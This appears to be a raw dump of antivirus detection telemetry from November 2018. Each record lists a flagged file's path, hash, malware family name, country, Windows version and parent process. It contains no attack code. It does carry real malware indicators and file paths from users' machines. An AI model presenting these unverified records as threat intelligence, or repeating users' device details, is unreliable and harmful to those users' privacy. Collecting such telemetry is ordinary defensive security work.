  Row(detection=Row(filename='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1BD9643D50CD60D80BFC219E44DAD7F46165582534FB00E134E874A5C3C6766E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1bd9643d50cd60d80bfc219e44dad7f46165582534fb00e134e874a5c3c6766e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:57:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160049-f288f09e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160049-F288F09E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mssys.exe', filepath='\\\\?\\C:\\Windows\\System\\sys\\syscon\\mssys.exe', filesize=1024000, name='APPL/EAMonitor.44e66f.#M1.#R1'), hash='44e66fc342c4470a94caa04d3c0530327391e07636707f007987849a7429dd2c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ags 12.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2012\\TAB AGS 12\\AGS 12.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k secsvcs', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:53:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Docume~1\\\\\\\\AllUse~1\\\\\\\\Templates\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-02T10:05:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160102-f3fe158a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160102-F3FE158A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='issues_after_install.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\Install\\Issues_After_Install\\Issues_After_Install.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\67F10537268ACDFD45AA577EC35FB4AEA6F0880EE2957F243795D1D936079303', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:38:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gtavicetrn.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\TRENER\\gtavicetrn\\gtavicetrn.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='36a2db40c4bf2921d7b552f795ca68a29a24ab8044cc43218954a78787a52d2a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112219-b2913fe8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7bdbbd95\\AVSCAN-20181102-112118-A7419E49\\AVSCAN-20181102-112219-B2913FE8', filesize=21184000, name='TR/Golroted.vhnhl.#M1.#R1'), hash='4ec929dac0c65758a056303afce2d0d23ae05b34b9dfda088c9a13d104fb7384', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe149_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe149 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T10:40:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tempsbe.bat', filepath='C:\\Users\\X\\Recorded TV\\TempRec\\TempSBE\\TempSBE.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134240-874e38e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134240-874E38E6', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:00:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_sfx.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\cw\\_SFX\\_SFX.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-215521-625a9f2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ba3b3259\\AVSCAN-20181102-215446-5D79BFF3\\AVSCAN-20181102-215521-625A9F2C', filesize=576000, name='TR/Black.Gen2.#M1.#R1'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:55:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:44:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mugen character maker.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\MUGEN Character Maker\\MUGEN Character Maker.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1ac0d838d1850a7c49e9a6d0c1d20c35774922835208858760a9be9034dba420', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='old character maker.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\MUGEN Character Maker\\Old Character Maker\\Old Character Maker.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17fda011ee2b31abf1cb952720428e6f97c148c7b9caf0e5791049a2cbad76db', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134406-955a7738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-134122-7A9B72AE\\AVSCAN-20181102-134406-955A7738', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wab.exe', filepath='E:\\WINDOWS\\$NtServicePackUninstall$\\wab.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='014d681f318edb59f382a127c9c252588c7e6213e544ec176752c576e57a64d5', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-170611-238e7088', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3607a123\\AVSCAN-20181102-170528-1AF72220\\AVSCAN-20181102-170611-238E7088', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:06:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094408-1d7b7cca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_106c5980\\AVSCAN-20181102-094245-153BFDD3\\AVSCAN-20181102-094408-1D7B7CCA', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:44:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181727-7b85852e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d328879\\AVSCAN-20181102-181711-7949CCA9\\AVSCAN-20181102-181727-7B85852E', filesize=128000, name='PUA/Outbrowse.Gen.#M1.#R1'), hash='46afe34ef9bcc3e2d76bd85f73235cabd22982b29ac85e5b8415ecb72fb10760', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:17:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120510-2ff5a1e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120510-2FF5A1E8', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='myhnelnw.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\MYHNElNw.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053131-8634af67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053131-8634AF67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050342-a3bb7296', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050342-A3BB7296', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001ffc', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001ffc', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052208-36b537e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052208-36B537E0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='log.bat', filepath='C:\\Users\\X\\Toshiba\\TFPU\\Log\\Log.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050243-80a6d561', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050243-80A6D561', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-111912-7730cbff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_785069e3\\AVSCAN-20181102-111853-73EF13DB\\AVSCAN-20181102-111912-7730CBFF', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143638-66eb56e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_078ca892\\AVSCAN-20181102-143621-649694C4\\AVSCAN-20181102-143638-66EB56E2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:44:39Z'), dt=datetime.date(2018, 11, 2)),
